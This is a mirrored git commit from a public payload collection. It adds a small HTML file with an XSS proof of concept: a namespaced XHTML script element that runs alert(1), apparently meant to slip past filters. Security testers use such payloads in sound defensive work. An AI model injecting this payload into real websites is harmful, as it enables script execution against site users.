mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2026-03-01 15:03:12 -08:00
XSS payloads
This commit is contained in:
6
XSS/XML XSS basic.html
Normal file
6
XSS/XML XSS basic.html
Normal file
@@ -0,0 +1,6 @@
|
||||
<html>
|
||||
<head></head>
|
||||
<body>
|
||||
<something:script xmlns:something="http://www.w3.org/1999/xhtml">alert(1)</something:script>
|
||||
</body>
|
||||
</html>
|
||||
Reference in New Issue
Block a user